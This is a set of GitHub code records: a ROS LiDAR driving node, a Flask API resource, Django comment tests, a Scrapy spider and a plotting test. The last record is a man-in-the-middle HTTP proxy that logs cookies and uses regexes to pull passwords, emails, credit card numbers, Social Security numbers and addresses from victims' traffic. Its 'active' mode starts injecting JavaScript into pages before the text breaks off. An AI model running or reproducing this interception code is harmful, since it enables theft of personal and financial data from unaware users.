number of LiDAR points with the distance of a closer\n LiDAR point, to avoid us crashing with the corner of the car.\n num_points: the number of points to cover\n start_idx: the LiDAR point we are using as our distance\n cover_right: True/False, decides whether we cover the points to\n right or to the left of start_idx\n ranges: the LiDAR points\n Possible improvements: reduce this function to fewer lines\n \"\"\"\n new_dist = ranges[start_idx]\n if cover_right:\n for i in range(num_points):\n next_idx = start_idx+1+i\n if next_idx >= len(ranges): break\n if ranges[next_idx] > new_dist:\n ranges[next_idx] = new_dist\n else:\n for i in range(num_points):\n next_idx = start_idx-1-i\n if next_idx < 0: break\n if ranges[next_idx] > new_dist:\n ranges[next_idx] = new_dist\n return ranges\n\n def extend_disparities(self, disparities, ranges, car_width, extra_pct):\n \"\"\" For each pair of points we have decided have a large difference\n between them, we choose which side to cover (the opposite to\n the closer point), call the cover function, and return the\n resultant covered array.\n Possible Improvements: reduce to fewer lines\n \"\"\"\n width_to_cover = 0.155 * (1+extra_pct/100)\n for index in disparities:\n first_idx = index-1\n points = ranges[first_idx:first_idx+2]\n close_idx = first_idx+np.argmin(points)\n far_idx = first_idx+np.argmax(points)\n close_dist = ranges[close_idx]\n num_points_to_cover = self.get_num_points_to_cover(close_dist,\n width_to_cover)\n cover_right = close_idx < far_idx\n ranges = self.cover_points(num_points_to_cover, close_idx,\n cover_right, ranges)\n return ranges\n\n def get_steering_angle(self, range_index, range_len):\n \"\"\" Calculate the angle that corresponds to a given LiDAR point and\n process it into a steering angle.\n Possible improvements: smoothing of aggressive steering angles\n \"\"\"\n lidar_angle = (range_index - (range_len/2)) * self.radians_per_point\n steering_angle = np.clip(lidar_angle, np.radians(-90), np.radians(90))/self.STEERING_SENSITIVITY\n return steering_angle\n\n def process_lidar(self, data):\n \"\"\" Run the disparity extender algorithm!\n Possible improvements: varying the speed based on the\n steering angle or the distance to the farthest point.\n \"\"\"\n drive_msg 
= AckermannDriveStamped()\n drive_msg.header.stamp = rospy.Time.now()\n\n ranges = data.ranges\n self.radians_per_point = (2*np.pi)/len(ranges)\n proc_ranges = self.preprocess_lidar(ranges)\n differences = self.get_differences(proc_ranges)\n disparities = self.get_disparities(differences, self.DIFFERENCE_THRESHOLD)\n proc_ranges = self.extend_disparities(disparities, proc_ranges,\n self.CAR_WIDTH, self.SAFETY_PERCENTAGE)\n steering_angle = self.get_steering_angle(proc_ranges.argmax(),\n len(proc_ranges))\n\n x = max(proc_ranges[227:237])\n speed = self.COEFFICIENT*math.exp(self.EXP_COEFFICIENT*(x**self.X_POWER))\n rospy.loginfo('x: {}, speed: {}'.format(x, speed))\n\n drive_msg = AckermannDriveStamped()\n drive_msg.header.stamp = rospy.Time.now()\n drive_msg.drive.steering_angle = steering_angle\n drive_msg.drive.speed = speed\n self.drive_pub.publish(drive_msg)\n\nif __name__ == '__main__':\n rospy.init_node(\"disparity_extender_node\", anonymous=True)\n disparity = DisparityExtender()\n rospy.sleep(0.1)\n rospy.spin()\n","repo_name":"FT-Autonomous/f1tenth-disparity-extender","sub_path":"src/disparity.py","file_name":"disparity.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"40869135500","text":"from flask_restful import Resource, reqparse\nfrom models.lender import LenderModel\n\n\n\nclass LenderResource(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument(\"name\",type=str, required=True, help=\"Must contain key (name) and value as a string in JSON request\")\n \n def get(self, id):\n lender = LenderModel.find_by_id(id)\n if not lender:\n return {\"Message\": \"The lender ID does not exist, please try again using a different ID\"}, 404\n return lender.json()\n\n def post(self):\n data = LenderResource.parser.parse_args()\n\n # lender is instantiated using key word arguments from the request\n lender = LenderModel(**data)\n\n try:\n lender.save_to_db()\n except:\n return {\"Message\": \"An error occured while trying to create a lender\"}, 500\n return lender.json(), 201\n\n def delete(self, id):\n lender = LenderModel.find_by_id(id)\n if lender:\n lender.delete_from_db()\n return {\"Message\": \"Item deleted\"}\n\n \n def put(self, id):\n data = LenderResource.parser.parse_args()\n lender = LenderModel.find_by_id(id)\n\n if lender is None:\n lender = LenderModel(**data)\n else:\n lender.name = data['name']\n lender.save_to_db()\n return lender.json()\n\n\nclass LenderList(Resource):\n def get(self):\n return {\"type\": \"Lenders\", \"data\": [v.json() for v in LenderModel.query.all()]}","repo_name":"williamle92/lender_api","sub_path":"resources/lender.py","file_name":"lender.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"21276399451","text":"from django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\nfrom .models import Post, Comment\nfrom knox.models import AuthToken\n\nCustomUser = get_user_model()\n\nclass CommentAPITests(APITestCase):\n def setUp(self):\n self.user = CustomUser.objects.create_user(username='testuser', email='testuser@example.com', password='testpass')\n self.token = AuthToken.objects.create(self.user)[1]\n self.post = Post.objects.create(description='Test Description', contact_info='Test Contact Info', user_info=self.user)\n self.comment = Comment.objects.create(content='Test Comment', post=self.post, user=self.user)\n def test_new_comment(self):\n url = reverse('new_comment')\n data = {'post_id': self.post.id, 'content': 'Test Comment'}\n self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token}')\n\n self.client.force_authenticate(user=self.user)\n response = self.client.post(url, data)\n print(response)\n print(response.data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(response.data['content'], data['content'])\n self.assertEqual(response.data['post'], data['post_id'])\n self.assertEqual(response.data['user'], self.user.id)\n\n def test_update_comment(self):\n url = reverse('update_comment', args=[self.comment.id])\n data = {'content': 'Updated Comment'}\n self.client.credentials(HTTP_AUTHORIZATION=f'Token {self.token}')\n\n self.client.force_authenticate(user=self.user)\n response = self.client.put(url, data)\n print(response)\n print(response.data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['content'], data['content'])\n self.assertTrue(response.data['is_edited'])\n\n def test_delete_comment(self):\n url = reverse('delete_comment', args=[self.comment.id])\n self.client.force_authenticate(user=self.user)\n response = self.client.delete(url)\n print(response)\n print(response.data)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n comment = Comment.objects.get(id=self.comment.id)\n self.assertTrue(comment.is_deleted)\n\n def test_get_comments(self):\n url = reverse('get_comments', args=[self.post.id])\n response = self.client.get(url)\n print(response)\n print(response.data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n self.assertEqual(response.data[0]['id'], self.comment.id)\n\n def test_get_user_comments(self):\n url = reverse('get_user_comments', args=[self.user.id])\n response = self.client.get(url)\n print(response)\n print(response.data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n self.assertEqual(response.data[0]['id'], self.comment.id) ","repo_name":"MuhammadBun/BuySellGo","sub_path":"comment/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"20194736904","text":"# -*- coding: utf-8 -*-\r\nimport scrapy\r\nimport time\r\nfrom scrapy.conf import settings\r\nfrom scrapy.mail import MailSender\r\nfrom ganji.items import BidNewsInfo\r\nimport authome_compare\r\nimport logging\r\n\r\nwebsite='newsbid'\r\n\r\nclass CarSpider(scrapy.Spider):\r\n name = website\r\n start_urls = ['http://www.bidnews.cn/caigou/search-htm-page-1-kw-qichejituan.html']\r\n # settings.set('DOWNLOAD_DELAY', 0.5, priority='cmdline')\r\n def __init__(self, **kwargs):\r\n # report bug session\r\n self.mailer = MailSender.from_settings(settings)\r\n self.counts = 0\r\n self.carnum = 50000\r\n # Mongo setting\r\n settings.set('CrawlCar_Num', self.carnum, priority='cmdline')\r\n settings.set('MONGODB_DB', 'newcar', priority='cmdline')\r\n settings.set('MONGODB_COLLECTION', website, priority='cmdline')\r\n\r\n def parse(self,response):\r\n url=response.url\r\n yield scrapy.Request(url,self.parse_middle)\r\n\r\n def parse_middle(self,response):\r\n x=response.xpath('//table[@class=\"zblist_table\"]/tr')\r\n try:\r\n for temp in x[1:36]:\r\n url = str(temp.xpath('td[3]/a/@href').extract_first())\r\n # url = str(temp.xpath('td[2]/a/@href').extract_first())\r\n yield scrapy.Request(url, callback=self.info_parse)\r\n except:\r\n for temp in x[1:36]:\r\n # url = str(temp.xpath('td[3]/a/@href').extract_first())\r\n url = str(temp.xpath('td[2]/a/@href').extract_first())\r\n yield scrapy.Request(url, callback=self.info_parse)\r\n next_page=response.xpath(u'//a[contains(text(),\"下一页\")]/@href')\r\n if next_page:\r\n url = response.urljoin(next_page.extract_first())\r\n yield scrapy.Request(url,callback=self.parse_middle,dont_filter=True)\r\n\r\n def info_parse(self,response):\r\n self.counts += 1\r\n item = BidNewsInfo()\r\n item['grabtime'] = time.strftime('%Y-%m-%d', time.localtime(time.time()))\r\n item['url'] = response.url\r\n item['status'] = response.url\r\n item['website'] = website\r\n item['desc']=response.xpath('//div[@class=\"xq_title\"]/h1/text()').extract_first() \\\r\n if response.xpath('//div[@class=\"xq_title\"]/h1/text()').extract_first() else \"_\"\r\n item['updatetime']=response.xpath('//div[@class=\"color_9 xq_time\"]/text()').re('\\d+\\-\\d+\\-\\d+')[0] \\\r\n if response.xpath('//div[@class=\"color_9 xq_time\"]/text()').re('\\d+\\-\\d+\\-\\d+') else \"_\"\r\n yield item\r\n","repo_name":"sinnettluo/ChenProject","sub_path":"cagey/newcar/ganji/spiders/bidnews_info.py","file_name":"bidnews_info.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"4346265747","text":"\"\"\"Test the output functions\n\"\"\"\n\nimport pytest\n\n\n@pytest.mark.output\ndef test_Arrow3D():\n import matplotlib.pyplot as plt\n\n from skydy.output import Arrow3D\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n\n basis = [\n (0, 2),\n (0, 3),\n (0, 4),\n ]\n arrow = Arrow3D(\n *basis,\n mutation_scale=5,\n lw=1,\n arrowstyle=\"-|>\",\n color=\"r\",\n )\n ax.add_artist(arrow)\n\n plt.show()\n","repo_name":"smkyle90/skydy","sub_path":"tests/output/test_Arrow3D.py","file_name":"test_Arrow3D.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"42009423720","text":"import socket\nimport signal\nimport threading\nfrom urllib.parse import urlparse, parse_qsl\nimport sys\nimport re\nimport logging\n\n\ndef get_fields(headers):\n\n fields = {}\n \n for header in headers:\n index = header.find(' ')\n # drop the ':' character\n field = header[:index-1]\n # get the value of the field\n value = header[index+1:]\n # add field, value to fields\n if field not in fields:\n fields[field] = list()\n fields[field].append(value)\n \n return fields\n\n\ndef recv_http(sock):\n \n request_length = 4096 \n content_length = -1\n fields = {}\n data = b''\n content = b''\n headers = [] \n\n # read request/status line and headers\n while True:\n received = sock.recv(request_length)\n if len(received) == 0:\n return None # error headers not found\n data += received\n # find the end of the the headers\n end = data.find(b'\\r\\n\\r\\n')\n if end != -1:\n headers = re.split('\\r\\n', data[:end+2].decode())\n # store the request line\n request = headers[0]\n # get fields and skip request/status line\n fields = get_fields(headers[1:-1]) \n # check for http get request\n if request.split(' ')[0] == 'GET':\n return headers[:-1], fields, data, ''\n else:\n break\n \n # store the post/response message content length \n if 'Content-Length' in fields:\n content_length = int(fields['Content-Length'][0])\n \n # store remaining content\n if end+4 < len(data):\n content += data[end+4:]\n # check if all content read\n if len(content) == content_length:\n return headers[:-1], fields, data, content\n \n # read body of request/response \n while True:\n received = sock.recv(request_length)\n if len(received) == 0:\n break\n data += received \n # update length of content received \n content += received\n # check if all content has been read\n if len(content) == content_length:\n break\n return headers[:-1], fields, data, content\n\n\ndef get_info_qs(qs, info, regexes):\n\n # parse query string into a dictionary\n query = dict(parse_qsl(qs))\n \n # store values from common query parameters\n for param in info.keys() & query.keys():\n info[param].add(query[param])\n \n # store values that match regex patterns \n for param, pattern in regexes.items():\n matches = re.findall(pattern, qs)\n if len(matches) > 0:\n for match in matches:\n info[param].add(match) \n \n \ndef get_info(data, info, regexes):\n \n # store values that match regex patterns \n for param, pattern in regexes.items():\n matches = re.findall(pattern, data)\n if len(matches) > 0:\n for match in matches:\n info[param].add(match) \n\n\ndef client_thread(logger, mode, client_sock, proxy_ip, proxy_port):\n # all possible params looked for \n params = set(['firstname', 'lastname', 'birthday', 'year', 'email', 'password', \n 'address', 'credit-card', 'social-security', 'phone', \n 'city', 'state', 'zip'])\n\n # regex patterns for users data\n regexes = {'email': '[a-zA-Z0-9]+(?:[\\.\\-_][a-zA-Z0-9]+)*@[a-zA-Z0-9]+\\.[a-zA-Z]{3}',\n 'year': '(?:\\d{1,2}[-\\./\\s]\\d{1,2}[-\\./\\s]\\d{4})|(?:\\d{4}[-\\./\\s]\\d{1,2}[-\\./\\s]\\d{1,2})',\n 'address': '\\d{1,3}.?\\d{0,3}\\s[a-zA-Z]{2,30}\\s[a-zA-Z]{2,15}',\n 'credit-card': '\\d{4}(?:[-\\s]\\d{4}){3}',\n 'social-security': '\\d{3}[-\\s]\\d{2}[-\\s]\\d{4}',\n 'phone': '(?:(?:1-)?\\d{3}-\\d{3}-\\d{4})|(?:1?\\(\\d{3}\\)\\d{3}-\\d{4})',\n 'zip': '\\d{5}(?:[-\\s]\\d{4})?'} \n info = dict([(param, set()) for param in params]) \n\n \n # get the request from browser\n request_length = 4096\n #request = client_sock.recv(request_length)\n headers, fields, request, 
content = recv_http(client_sock) \n\n url = headers[0].split(' ')[1]\n parsed = urlparse(url)\n \n # log cookie information\n if 'Set-Cookie' in fields:\n logger.info('Set-Cookie: ' + ','.join(fields['Set-Cookie']))\n \n if 'Cookie' in fields:\n logger.info('Cookie: ' + ','.join(fields['Cookie']))\n\n # check for injected javascript request:\n if len(parsed.netloc) == 0 and len(parsed.query) > 0:\n query = dict(parse_qsl(parsed.query))\n # check if all params are present in request\n if all(param in query for param in ['user-agent', 'screen', 'lang']):\n info2 = open(\"info_2.txt\", \"w\")\n # store parameters to file\n for param, val in query.items():\n info2.write(param + \": \" + val + \"\\n\")\n info2.close()\n \n if parsed.scheme == 'http':\n\n # check for info in client content \n if len(content) > 0:\n # check content type of client request\n if 'Content-Type' in fields:\n # get mime type of content\n content_type = fields['Content-Type'][0]\n # check if content type is a query string\n if content_type == 'application/x-www-form-urlencoded':\n # get info found in query string\n get_info_qs(content.decode(), info, regexes)\n elif content_type.split('/')[0] == 'text':\n # get info found in text \n get_info(data.decode(), info, regexes) \n\n # check for info in url\n if len(parsed.query) > 0:\n # get info found in query string\n get_info_qs(parsed.query, info, regexes)\n\n port = 80\n server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n server_sock.connect((parsed.netloc, port))\n server_sock.sendall(request)\n \n #data, headers, fields, content = recv_http(server_sock)\n headers, fields, data, content = recv_http(server_sock)\n \n # log cookie information\n if 'Set-Cookie' in fields:\n logger.info('Set-Cookie: ' + ','.join(fields['Set-Cookie']))\n \n if 'Cookie' in fields:\n logger.info('Cookie: ' + ','.join(fields['Cookie']))\n\n if 'Content-Type' in fields:\n # get mime type of content\n content_type = fields['Content-Type'][0]\n # check if type is text\n if content_type.split('/')[0] == 'text': \n # update info found in content \n get_info(data.decode(), info, regexes)\n \n # log all info found \n for param, vals in info.items():\n if len(vals) > 0:\n logger.info(param + ': ' + ','.join(vals)) \n \n # check mode being used\n if mode == \"active\":\n # inject script\n script_format = '''\n'''\n # insert proxy ip and port to script\n script = script_format.format(ip = proxy_ip, port = proxy_port)\n html_end = data.find(b'